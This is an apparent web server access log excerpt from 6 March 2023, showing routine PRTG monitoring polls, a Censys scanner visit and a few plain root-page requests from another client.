212.91.246.72 - - [06/Mar/2023:07:13:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:14:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:15:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:16:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:16:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:17:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:18:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:18:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:19:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:20:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:21:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:22:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:23:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:25:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.58 - - [06/Mar/2023:07:25:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [06/Mar/2023:07:25:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.58 - - [06/Mar/2023:07:25:59 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.58 - - [06/Mar/2023:07:25:59 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [06/Mar/2023:07:26:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:27:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:28:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:29:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:30:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:31:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:32:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:32:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:07:33:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
